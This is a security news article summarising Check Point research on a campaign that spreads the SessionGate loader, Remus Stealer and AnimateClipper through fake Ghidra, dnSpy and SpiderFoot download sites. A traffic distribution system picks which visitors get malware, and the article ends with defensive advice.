Cybersecurity researchers have uncovered a large-scale malware distribution operation that impersonates popular open-source and freeware projects to lure users into downloading malicious software. The campaign uses a sophisticated Traffic Distribution System (TDS) to selectively deliver malware while appearing legitimate to both users and security analysts.
Researchers at Check Point have identified a network of fake websites designed to mimic trusted software projects and security tools. These sites closely resemble legitimate project portals, making it difficult for users to distinguish them from authentic sources.
How the Campaign Works
At first glance, the fraudulent websites appear convincing and often include references to genuine project resources. However, the real deception begins when visitors attempt to download software.
When a user clicks a download button, a hidden JavaScript layer hosted through Amazon CloudFront intercepts the request and redirects the visitor through a Traffic Distribution System (TDS). This system evaluates the visitor using multiple filtering mechanisms before deciding what content to deliver.
The TDS employs several advanced techniques, including:
- First-visit verification
- Mandatory user interaction checks
- Anti-bot and anti-analysis protections
- VPN and data center detection
- Frequency-based access controls
These measures help attackers identify legitimate users while avoiding detection by automated security tools and researchers.
Trusted Software Brands Being Abused
The campaign targets individuals searching for popular security and reverse-engineering tools online. Some of the fake websites have been found impersonating well-known projects such as:
- Ghidra
- dnSpy
- SpiderFoot
Attackers use search engine optimization (SEO) techniques to push these fraudulent sites toward the top of search engine results, sometimes outranking the legitimate project websites.
Researchers believe the operation has been active since September 2025. Earlier investigations suggested the sites were primarily used for traffic generation and advertising revenue. However, evidence now indicates the infrastructure was repurposed for malware distribution beginning in January 2026.
A Deceptive Download Experience
One particularly deceptive tactic involves displaying legitimate download URLs when users hover over download buttons. This creates a false sense of trust and makes the website appear authentic.
Once clicked, however, users are redirected through a carefully controlled chain of servers that ultimately delivers malware.
The infrastructure is also designed to behave differently depending on the visitor. Users attempting repeated downloads from the same IP address may receive harmless software such as browser installers or extensions, making detection and analysis more difficult.
Malware Families Distributed Through the Campaign
Researchers identified several malware families being delivered through the TDS infrastructure.
SessionGate
SessionGate is a newly discovered multi-stage malware loader that serves as the foundation of the operation.
Key capabilities include:
- Multi-layer obfuscation
- Advanced anti-analysis protections
- Sandbox evasion techniques
- Delivery of potentially unwanted applications (PUAs)
- Selective malware deployment
The framework can redirect security researchers to harmless software installations while reserving malicious payloads for targeted victims.
Remus Stealer
Remus Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) model.
Its capabilities include:
- Theft of browser credentials
- Cookie extraction
- Data collection from more than 20 browsers
- Targeting cryptocurrency wallets
- Accessing password managers
- Harvesting two-factor authentication data
Researchers believe Remus Stealer may be a variant of the well-known Lumma Stealer family.
AnimateClipper
AnimateClipper is a cryptocurrency-focused malware strain designed to hijack financial transactions.
The malware monitors clipboard activity and replaces copied cryptocurrency wallet addresses with attacker-controlled addresses before funds are transferred.
According to researchers, AnimateClipper supports more than 20 blockchain ecosystems and is often delivered through social engineering techniques known as ClickFix attacks.
Global Impact
Analysis of security telemetry has revealed between 2,000 and 3,500 malware submissions linked to SessionGate. The majority of detections have originated from:
- Turkey
- Poland
- Brazil
- Germany
- France
- Russia
- United Kingdom
The malware delivery process is highly dynamic, with payloads customized for individual victims after successfully navigating the entire redirection chain.
Why This Campaign Is Dangerous
The final malware delivery stage involves downloading encrypted configurations from remote servers, extracting hidden payload URLs, and silently executing additional malware using Windows command-line processes.
Researchers emphasize that while traffic monetization may be one objective, the infrastructure also provides an effective platform for cybercriminals to distribute malware selectively.
By combining search engine manipulation, realistic software portals, advanced traffic filtering, and targeted malware delivery, the operators have created a highly effective ecosystem that can generate revenue while simultaneously supporting cybercriminal operations.
Security Recommendations
To reduce the risk of infection, organizations and individual users should:
- Download software only from official project websites.
- Verify URLs before downloading tools.
- Use endpoint protection capable of detecting suspicious loaders.
- Monitor browser extensions and installed applications.
- Educate users about fake software download sites and phishing tactics.
- Verify software hashes whenever possible.
Conclusion
The discovery of this campaign highlights the growing sophistication of malware distribution networks. By exploiting trust in popular open-source projects and leveraging advanced traffic distribution systems, attackers can selectively target victims while remaining difficult to detect. Organizations should remain vigilant and ensure software is obtained only from verified and trusted sources.
